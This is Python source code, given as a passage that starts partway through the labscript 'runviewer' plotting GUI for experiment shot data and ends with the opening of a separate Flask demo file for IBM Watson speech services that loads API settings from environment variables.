for shot in self.plot_items[channel]:
if shot == current_shot:
colour = item.data(Qt.UserRole)
self.plot_items[channel][shot].setPen(pg.mkPen(QColor(colour()), width=2))
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__SHUTTER_INDEX:
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
self.on_toggle_shutter(item.checkState(), current_shot)
def load_shot(self, filepath):
shot = Shot(filepath)
# add shot to shot list
# Create Items
items = []
colour_item = QStandardItem('')
colour_item.setEditable(False)
colour_item.setToolTip('Double-click to change colour')
items.append(colour_item)
check_shutter = QStandardItem()
check_shutter.setCheckable(True)
check_shutter.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_shutter.setEnabled(False)
check_shutter.setToolTip("Toggle shutter markers")
items.append(check_shutter)
check_item = QStandardItem(shot.path)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_item.setData(shot)
check_item.setToolTip(filepath)
items.append(check_item)
# script name
# path_item = QStandardItem(shot.path)
# path_item.setEditable(False)
# items.append(path_item)
self.shot_model.appendRow(items)
self.ui.markers_comboBox.addItem(os.path.basename(shot.path), shot)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(shot.path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
# only do this if we are checking the shot we are adding
# self.update_channels_treeview()
def get_selected_shots_and_colours(self):
# get the ticked shots
ticked_shots = {}
for i in range(self.shot_model.rowCount()):
item = self.shot_model.item(i, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(i, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(i, SHOT_MODEL__SHUTTER_INDEX)
if item.checkState() == Qt.Checked:
shot = item.data()
colour_item_data = colour_item.data(Qt.UserRole)
ticked_shots[shot] = (colour_item_data(), shutter_item.checkState())
return ticked_shots
def update_channels_treeview(self):
ticked_shots = self.get_selected_shots_and_colours()
# get set of channels
channels = {}
for shot in ticked_shots.keys():
channels[shot] = set(shot.channels)
channels_set = frozenset().union(*channels.values())
# now find channels in channels_set which are not in the treeview, and add them
# now find channels in channels set which are already in the treeview, but deactivated, and activate them
treeview_channels_dict = {}
deactivated_treeview_channels_dict = {}
for i in range(self.channel_model.rowCount()):
item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
# Sanity check
if str(item.text()) in treeview_channels_dict:
raise RuntimeError("A duplicate channel name was detected in the treeview due to an internal error. Please lodge a bugreport detailing how the channels with the same name appeared in the channel treeview. Please restart the application")
treeview_channels_dict[str(item.text())] = i
if not item.isEnabled():
deactivated_treeview_channels_dict[str(item.text())] = i
treeview_channels = set(treeview_channels_dict.keys())
deactivated_treeview_channels = set(deactivated_treeview_channels_dict.keys())
        # speed up working with self.channel_model by blocking signals and later re-enabling them
self.channel_model.blockSignals(True)
# find list of channels to work with
channels_to_add = channels_set.difference(treeview_channels)
for channel in sorted(channels_to_add):
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked)
items.append(check_item)
# channel_name_item = QStandardItem(channel)
# channel_name_item.setEditable(False)
# items.append(channel_name_item)
self.channel_model.appendRow(items)
channels_to_reactivate = deactivated_treeview_channels.intersection(channels_set)
for channel in channels_to_reactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(deactivated_treeview_channels_dict[channel], i)
item.setEnabled(True)
item.setSelectable(True)
# now find channels in the treeview which are not in the channels_set and deactivate them
channels_to_deactivate = treeview_channels.difference(channels_set)
for channel in channels_to_deactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(treeview_channels_dict[channel], i)
item.setEnabled(False)
item.setSelectable(False)
self.channel_model.blockSignals(False)
self.channel_model.layoutChanged.emit()
# TODO: Also update entries in groups
self.update_plots()
def update_plots(self):
# get list of selected shots
ticked_shots = self.get_selected_shots_and_colours()
        # Should we rescale the x-axis?
# if self._hidden_plot[0].getViewBox.getState()['autoRange'][0]:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
# else:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis, enable=False)
# find stop time of longest ticked shot
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if shot.stop_time > largest_stop_time:
largest_stop_time = shot.stop_time
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
# Update plots
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
# we want to show this plot
# does a plot already exist? If yes, show it
if channel in self.plot_widgets:
self.plot_widgets[channel].show()
# update the plot
                    # are there any plot items for this channel which are shown but should not be?
to_delete = []
for shot in self.plot_items[channel]:
if shot not in ticked_shots.keys():
self.plot_widgets[channel].removeItem(self.plot_items[channel][shot])
# Remove Shutter Markers of unticked Shots
if shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
self.plot_widgets[channel].removeItem(line)
for line in self.shutter_lines[channel][shot][1]:
self.plot_widgets[channel].removeItem(line)
self.shutter_lines[channel].pop(shot)
to_delete.append(shot)
for shot in to_delete:
del self.plot_items[channel][shot]
# do we need to add any plot items for shots that were not previously selected?
for shot, (colour, shutters_checked) in ticked_shots.items():
if shot not in self.plot_items[channel]:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
                            # Add an empty plot, since the custom resampling we do happens more quickly if we don't attempt to plot all of the data first
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
# Add Shutter Markers of newly ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
for t, m in self.all_markers.items():
color = m['color']
color = QColor(color[0], color[1], color[2])
if self.scale_time and self.scalehandler is not None:
t = self.scalehandler.get_scaled_time(t)
line = self.plot_widgets[channel].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine))
self.all_marker_items[line] = self.plot_widgets[channel]
# If no, create one
else:
self.create_plot(channel, ticked_shots)
else:
if channel not in self.plot_widgets:
self.create_plot(channel, ticked_shots)
self.plot_widgets[channel].hide()
self._resample = True
def create_plot(self, channel, ticked_shots):
self.plot_widgets[channel] = pg.PlotWidget() # name=channel)
self.plot_widgets[channel].setMinimumHeight(200)
self.plot_widgets[channel].setMaximumHeight(200)
self.plot_widgets[channel].setLabel('bottom', 'Time', units='s')
self.plot_widgets[channel].showAxis('right', True)
self.plot_widgets[channel].showAxis('bottom', True)
self.plot_widgets[channel].setXLink('runviewer - time axis link')
self.plot_widgets[channel].sigXRangeChanged.connect(self.on_x_range_changed)
self.plot_widgets[channel].scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, self.plot_widgets[channel], channel))
self.ui.plot_layout.insertWidget(self.ui.plot_layout.count() - 1, self.plot_widgets[channel])
self.shutter_lines[channel] = {} # initialize Storage for shutter lines
self.plot_items.setdefault(channel, {})
has_units = False
units = ''
for shot, (colour, shutters_checked) in ticked_shots.items():
if channel in shot.traces:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
                # Add an empty plot, since the custom resampling we do happens more quickly if we don't attempt to plot all of the data first
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
if len(shot.traces[channel]) == 3:
has_units = True
units = shot.traces[channel][2]
# Add Shutter Markers of ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
if has_units:
self.plot_widgets[channel].setLabel('left', channel, units=units)
else:
self.plot_widgets[channel].setLabel('left', channel)
def add_shutter_markers(self, shot, channel, shutters_checked):
if shot not in self.shutter_lines[channel] and channel in shot.shutter_times:
self.shutter_lines[channel][shot] = [[], []]
open_color = QColor(0, 255, 0)
close_color = QColor(255, 0, 0)
for t, val in shot.shutter_times[channel].items():
scaled_t = t
if val: # val != 0, shutter open
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=open_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][1].append(line)
if not shutters_checked:
line.hide()
else: # else shutter close
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=close_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][0].append(line)
if not shutters_checked:
line.hide()
def on_x_range_changed(self, *args):
# print 'x range changed'
self._resample = True
@inmain_decorator(wait_for_return=True)
def _get_resample_params(self, channel, shot):
rect = self.plot_items[channel][shot].getViewBox().viewRect()
xmin, xmax = rect.left(), rect.width() + rect.left()
dx = xmax - xmin
view_range = self.plot_widgets[channel].viewRange()
return view_range[0][0], view_range[0][1], dx
def resample(self, data_x, data_y, xmin, xmax, stop_time, num_pixels):
"""This is a function for downsampling the data before plotting
it. Unlike using nearest neighbour interpolation, this method
preserves the features of the plot. It chooses what value to
use based on what values within a region are most different
from the values it's already chosen. This way, spikes of a short
duration won't just be skipped over as they would with any sort
of interpolation."""
# TODO: Only finely sample the currently visible region. Coarsely sample the rest
# x_out = numpy.float32(numpy.linspace(data_x[0], data_x[-1], 4000*(data_x[-1]-data_x[0])/(xmax-xmin)))
x_out = numpy.float64(numpy.linspace(xmin, xmax, 3 * 2000 + 2))
y_out = numpy.empty(len(x_out) - 1, dtype=numpy.float64)
data_x = numpy.float64(data_x)
data_y = numpy.float64(data_y)
# TODO: investigate only resampling when necessary.
# Currently pyqtgraph sometimes has trouble rendering things
# if you don't resample. If a point is far off the graph,
# and this point is the first that should be drawn for stepMode,
# because there is a long gap before the next point (which is
# visible) then there is a problem.
# Also need to explicitly handle cases where none of the data
# is visible (which resampling does by setting NaNs)
#
# x_data_slice = data_x[(data_x>=xmin)&(data_x<=xmax)]
# print len(data_x)
# if len(x_data_slice) < 3*2000+2:
# x_out = x_data_slice
# y_out = data_y[(data_x>=xmin)&(data_x<=xmax)][:-1]
# logger.info('skipping resampling')
# else:
resampling = True
if resampling:
_resample(data_x, data_y, x_out, y_out, numpy.float64(stop_time))
# self.__resample4(data_x, data_y, x_out, y_out, numpy.float32(stop_time))
else:
x_out, y_out = data_x, data_y
return x_out, y_out
def __resample4(self, x_in, y_in, x_out, y_out, stop_time):
# we want x-out to have three times the number of points as there are pixels
# Plus one at the end
# y_out = numpy.empty(len(x_out)-1, dtype=numpy.float64)
# print 'len x_out: %d'%len(x_out)
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
y_out.fill('NaN')
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
i = 0
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
i = 0
j = 1
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
y_out[i + 1] = numpy.float('NaN')
y_out[i + 2] = numpy.float('NaN')
i += 3
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
# y_out[i] = y_in[j-1]
# i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out) - 2: # Leave one spare for the final data point and one because stepMode=True requires len(y)=len(x)-1
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
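                # For example: with x_in = [0, 1, 2], y_in = [3, 7, 9] and an output sample at
                # x_out[i] = 1.5, the value taken here is y_in[j - 1] = 7, i.e. the most recent
                # source value to the left of the output time.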
y_out[i] = y_in[j - 1]
i += 2
positive_jump_value = 0
positive_jump_index = j - 1
negative_jump_value = 0
negative_jump_index = j - 1
# now find the max and min values between this x_out time point and the next x_out timepoint
# print i
while j < len(x_in) and x_in[j] < x_out[i]:
jump = y_in[j] - y_out[i - 2]
# would using this source value cause a bigger positive jump?
if jump > 0 and jump > positive_jump_value:
positive_jump_value = jump
positive_jump_index = j
# would using this source value cause a bigger negative jump?
elif jump < 0 and jump < negative_jump_value:
negative_jump_value = jump
negative_jump_index = j
j += 1
if positive_jump_index < negative_jump_index:
y_out[i - 1] = y_in[positive_jump_index]
y_out[i] = y_in[negative_jump_index]
# TODO: We could override the x_out values with x_in[jump_index]
else:
y_out[i - 1] = y_in[negative_jump_index]
y_out[i] = y_in[positive_jump_index]
i += 1
# Get the last datapoint:
if j < len(x_in):
# If the sample rate of the raw data is low, then the current
# j point could be outside the current plot view range
# If so, decrease j so that we take a value that is within the
# plot view range.
if x_in[j] > x_out[-1] and j > 0:
j -= 1
y_out[i] = y_in[j]
i += 1
# if i < len(x_out):
# y_out[i] = y_in[-1]
# i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
# return y_out # method changed to modify y_out array in place
def __resample3(self, x_in, y_in, x_out, stop_time):
"""This is a Python implementation of the C extension. For
debugging and developing the C extension."""
y_out = numpy.empty(len(x_out))
i = 0
j = 1
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
while i < len(x_out):
y_out[i] = numpy.float('NaN')
i += 1
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
i += 1
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
y_out[i] = y_in[j - 1]
i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out):
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
while j < len(x_in) and x_in[j] < x_out[i]:
# Would using this source value cause the interpolated values
# to make a bigger jump?
if numpy.abs(y_in[j] - y_out[i - 1]) > numpy.abs(y_out[i] - y_out[i - 1]):
# If so, use this source value:
y_out[i] = y_in[j]
j += 1
i += 1
# Get the last datapoint:
if i < len(x_out):
y_out[i] = y_in[-1]
i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
return y_out
def _resample_thread(self):
logger = logging.getLogger('runviewer.resample_thread')
while True:
if self._resample:
self._resample = False
# print 'resampling'
ticked_shots = inmain(self.get_selected_shots_and_colours)
for shot, (colour, shutters_checked) in ticked_shots.items():
for channel in shot.traces:
if self.channel_checked_and_enabled(channel):
try:
xmin, xmax, dx = self._get_resample_params(channel, shot)
# We go a bit outside the visible range so that scrolling
# doesn't immediately go off the edge of the data, and the
# next resampling might have time to fill in more data before
# the user sees any empty space.
if self.scale_time:
xnew, ynew = self.resample(shot.scaled_times(channel), shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
else:
xnew, ynew = self.resample(shot.traces[channel][0], shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
inmain(self.plot_items[channel][shot].setData, xnew, ynew, pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
except Exception:
#self._resample = True
pass
else:
logger.info('ignoring channel %s' % channel)
time.sleep(0.5)
@inmain_decorator(wait_for_return=True)
def channel_checked_and_enabled(self, channel):
logger.info('is channel %s enabled' % channel)
index = self.channel_model.index(0, CHANNEL_MODEL__CHANNEL_INDEX)
indexes = self.channel_model.match(index, Qt.DisplayRole, channel, 1, Qt.MatchExactly)
logger.info('number of matches %d' % len(indexes))
if len(indexes) == 1:
check_item = self.channel_model.itemFromIndex(indexes[0])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
return True
return False
def on_x_axis_reset(self):
self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
def on_y_axes_reset(self):
for plot_widget in self.plot_widgets.values():
plot_widget.enableAutoRange(axis=pg.ViewBox.YAxis)
def _enable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Checked)
def _disable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Unchecked)
def update_ticks_of_selected_shots(self, state):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# for each row selected
for row in selected_row_list:
check_item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
check_item.setCheckState(state)
def _move_up(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_plot_positions()
def _move_down(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
            # only move the row if it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
                # Add the selected row into a position one below
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_plot_positions()
def _move_top(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_plot_positions()
def _move_bottom(self):
selection_model = self.ui.channel_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
            # only move the row while it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
                # Add the selected row into a position one below
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_plot_positions()
def update_plot_positions(self):
# remove all widgets
layout_items = {}
for i in range(self.ui.plot_layout.count()):
if i == 0:
continue
item = self.ui.plot_layout.takeAt(i)
# add all widgets
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if channel in self.plot_widgets:
self.ui.plot_layout.addWidget(self.plot_widgets[channel])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
self.plot_widgets[channel].show()
else:
self.plot_widgets[channel].hide()
self.ui.plot_layout.addWidget(self._time_axis_plot[0])
class Shot(object):
def __init__(self, path):
self.path = path
# Store list of traces
self._traces = None
# store list of channels
self._channels = None
# store list of markers
self._markers = None
self.cached_scaler = None
self._scalehandler = None
self._scaled_x = {}
        # store list of shutter changes and calibrations
self._shutter_times = None
self._shutter_calibrations = {}
# TODO: Get this dynamically
device_list = ['PulseBlaster', 'NI_PCIe_6363', 'NI_PCI_6733']
# Load connection table
self.connection_table = ConnectionTable(path)
# open h5 file
with h5py.File(path, 'r') as file:
# Get master pseudoclock
self.master_pseudoclock_name = file['connection table'].attrs['master_pseudoclock']
if isinstance(self.master_pseudoclock_name, bytes):
self.master_pseudoclock_name = self.master_pseudoclock_name.decode('utf8')
else:
self.master_pseudoclock_name = str(self.master_pseudoclock_name)
# get stop time
self.stop_time = file['devices'][self.master_pseudoclock_name].attrs['stop_time']
self.device_names = list(file['devices'].keys())
# Get Shutter Calibrations
if 'calibrations' in file and 'Shutter' in file['calibrations']:
for name, open_delay, close_delay in numpy.array(file['calibrations']['Shutter']):
self._shutter_calibrations[name] = [open_delay, close_delay]
def delete_cache(self):
self._channels = None
self._traces = None
def _load(self):
if self._channels is None:
self._channels = {}
if self._traces is None:
self._traces = {}
if self._markers is None:
self._markers = {}
if self._shutter_times is None:
self._shutter_times = {}
self._load_markers()
# Let's walk the connection table, starting with the master pseudoclock
master_pseudoclock_device = self.connection_table.find_by_name(self.master_pseudoclock_name)
self._load_device(master_pseudoclock_device)
        self._scalehandler = ScaleHandler(list(self._markers.keys()), self.stop_time)  # list() because ScaleHandler appends to its argument
def _load_markers(self):
with h5py.File(self.path, 'r') as file:
if "time_markers" in file:
for row in file["time_markers"]:
self._markers[row['time']] = {'color': row['color'].tolist()[0], 'label': row['label']}
elif "runviewer" in file:
for time, val in file["runviewer"]["markers"].attrs.items():
props = val.strip('{}}').rsplit(",", 1)
color = list(map(int, props[0].split(":")[1].strip(" ()").split(",")))
label = props[1].split(":")[1]
self._markers[float(time)] = {'color': color, 'label': label}
def add_trace(self, name, trace, parent_device_name, connection):
name = str(name)
self._channels[name] = {'device_name': parent_device_name, 'port': connection}
self._traces[name] = trace
# add shutter times
try:
con = self.connection_table.find_by_name(name)
if con.device_class == "Shutter":
self.add_shutter_times([(name, con.properties['open_state'])])
except KeyError:
pass
# Temporary solution to physical shutter times
def add_shutter_times(self, shutters):
for name, open_state in shutters:
x_values, y_values = self._traces[name]
if len(x_values) > 0:
change_indices = numpy.where(y_values[:-1] != y_values[1:])[0]
change_indices += 1 # use the index of the value that is changed to
                change_values = list(zip(x_values[change_indices], y_values[change_indices]))  # list() so insert() also works on Python 3
                change_values.insert(0, (x_values[0], y_values[0]))  # insert first value
self._shutter_times[name] = {x_value + (self._shutter_calibrations[name][0] if y_value == open_state else self._shutter_calibrations[name][1]): 1 if y_value == open_state else 0 for x_value, y_value in change_values}
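        # Worked example (illustrative): for a shutter trace with x_values = [0, 1, 2], y_values = [0, 1, 0],
        # open_state = 1 and calibrations [open_delay, close_delay] = [0.003, 0.002], the change points
        # (including the initial value) are [(0, 0), (1, 1), (2, 0)], giving
        # shutter_times = {0.002: 0, 1.003: 1, 2.002: 0}.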
def _load_device(self, device, clock=None):
try:
print('loading %s' % device.name)
module = device.device_class
# Load the master pseudoclock class
# labscript_devices.import_device(module)
device_class = labscript_devices.get_runviewer_parser(module)
device_instance = device_class(self.path, device)
clocklines_and_triggers = device_instance.get_traces(self.add_trace, clock)
for name, trace in clocklines_and_triggers.items():
child_device = self.connection_table.find_by_name(name)
for grandchild_device_name, grandchild_device in child_device.child_list.items():
self._load_device(grandchild_device, trace)
except Exception:
# TODO: print/log exception traceback
# if device.name == 'ni_card_0' or device.name == 'pulseblaster_0' or device.name == 'pineblaster_0' or device.name == 'ni_card_1' or device.name == 'novatechdds9m_0':
# raise
# raise
if hasattr(device, 'name'):
print('Failed to load device %s' % device.name)
else:
print('Failed to load device (unknown name, device object does not have attribute name)')
# backwards compat
with h5py.File(self.path, 'r') as file:
if "runviewer" in file:
if "shutter_times" in file["runviewer"]:
for name, val in file["runviewer"]["shutter_times"].attrs.items():
self._shutter_times[name] = {float(key_value.split(":")[0]): int(key_value.split(":")[1]) for key_value in val.strip('{}}').split(",")}
def scaled_times(self, channel):
if self.cached_scaler != app.scalehandler:
self.cached_scaler = app.scalehandler
self._scaled_x = {}
if channel not in self._scaled_x:
self._scaled_x[channel] = self.cached_scaler.get_scaled_time(self._traces[channel][0])
return self._scaled_x[channel]
@property
def channels(self):
if self._channels is None:
self._load()
return self._channels.keys()
def clear_cache(self):
# clear cache variables to cut down on memory usage
pass
@property
def markers(self):
if self._markers is None:
self._load()
return self._markers
@property
def traces(self):
# if traces cached:
# return cached traces and waits
if self._traces is None:
self._load()
return self._traces
@property
def shutter_times(self):
if self._shutter_times is None:
self._load()
return self._shutter_times
@property
def scalehandler(self):
if self._scalehandler is None:
self._load()
return self._scalehandler
class TempShot(Shot):
def __init__(self, i):
Shot.__init__(self, 'shot %d' % i)
self._channels = ['Bx', 'By', 'Bz', 'Bq']
self.stop_time = i + 1
self.traces = {}
no_x_points = 10000
for channel in self.channels:
# self.traces[channel] = (numpy.linspace(0,10,no_x_points), numpy.random.rand(no_x_points))
x_points = numpy.linspace(0, self.stop_time, no_x_points)
self.traces[channel] = (x_points, (i + 1) * numpy.sin(x_points * numpy.pi + i / 11.0 * 2 * numpy.pi))
@property
def channels(self):
return self._channels
def get_traces(self):
return self.traces
class RunviewerServer(ZMQServer):
def __init__(self, *args, **kwargs):
ZMQServer.__init__(self, *args, **kwargs)
self.logger = logging.getLogger('runviewer.server')
def handler(self, h5_filepath):
if h5_filepath == 'hello':
return 'hello'
self.logger.info('Received hdf5 file: %s' % h5_filepath)
# Convert path to local slashes and shared drive prefix:
h5_filepath = labscript_utils.shared_drive.path_to_local(h5_filepath)
logger.info('local filepath: %s' % h5_filepath)
# we add the shot to a queue so that we don't have to wait for the app to come up before
# responding to runmanager
shots_to_process_queue.put(h5_filepath)
return 'ok'
if __name__ == "__main__":
qapplication = QApplication(sys.argv)
shots_to_process_queue = Queue()
exp_config = LabConfig(required_params = {"DEFAULT": ["experiment_name"], "paths": ["shared_drive", "experiment_shot_storage"], 'ports': ['runviewer']})
port = int(exp_config.get('ports', 'runviewer'))
myappid = 'monashbec.runviewer' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
logger.info('Not on a windows machine')
# Start experiment server
experiment_server = RunviewerServer(port)
app = RunViewer(exp_config)
def execute_program():
qapplication.exec_()
sys.exit(execute_program())
|
Speech_demo.py
|
"""
https://cloud.ibm.com/docs/speech-to-text?topic=speech-to-text-websockets#websockets
Speech samples
https://upload.wikimedia.org/wikipedia/commons/d/d4/Samuel_George_Lewis.ogg
https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav
https://www.signalogic.com/index.pl?page=speech_codec_wav_samples
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0010_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0030_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/british/OSR_uk_000_0020_8k.wav - british
http://www.voiptroubleshooter.com/open_speech/french/OSR_fr_000_0041_8k.wav - french
"""
import os
import requests
import sys
from flask import Flask, request, render_template, jsonify, abort
import uuid
import json
from ibm_watson import IAMTokenManager
import threading
from threading import Thread
import websocket
"""
For debugging
"""
def print_environment_variables():
print('Environment Variables:')
for key in os.environ.keys():
print("\'%s\':\t\'%s\'" % (key, os.environ.get(key)))
# print_environment_variables()
# Audio formats supported by Speech to Text and Text to Speech
AUDIO_FORMATS = {
'audio/basic',
'audio/ogg',
'audio/mp3',
'audio/flac',
'audio/mpeg',
'audio/wav',
'audio/webm'
}
app = Flask(__name__)
port = os.getenv('PORT', '5030')
# Need these next two lines to eliminate the 'A secret key is required to use CSRF.' error
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
env_var = 'TTS_API_URL'
if env_var in os.environ:
TTS_API_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_API_URL'
if env_var in os.environ:
STT_API_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'TTS_API_KEY'
if env_var in os.environ:
TTS_API_KEY = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_API_KEY'
if env_var in os.environ:
STT_API_KEY = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_WS_URL'
if env_var in os.environ:
STT_WS_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
